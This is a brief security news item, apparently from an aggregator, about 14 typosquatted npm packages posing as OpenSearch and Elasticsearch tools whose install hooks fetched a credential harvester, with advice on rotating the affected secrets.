A single attacker published 14 malicious npm packages that pretended to be OpenSearch, Elasticsearch, and related developer tools, putting developers and build systems at risk of secret theft. Microsoft said the packages were uploaded under the alias "vpmdhaj" and used typosquatting, spoofed metadata, and inflated version numbers; on install, preinstall hooks fetched a second-stage credential harvester targeting Amazon Web Services, HashiCorp Vault, GitHub Actions, and npm tokens. The packages were removed after publication.
Why it matters: Anyone who installed or built these packages may have exposed credentials that can be reused to access cloud accounts, code pipelines, and package publishing systems. Organizations should identify affected installs from May 28 onward, rotate AWS Identity and Access Management or Security Token Service credentials, Vault tokens, npm publish tokens, and GitHub Actions secrets, and review for follow-on compromise.
2026.05.29
100% relevant
This article establishes a distinct npm package supply-chain incident centered on 14 typosquatted packages targeting OpenSearch and Elasticsearch users, not one of the existing tracked package compromises.
← Back to all stories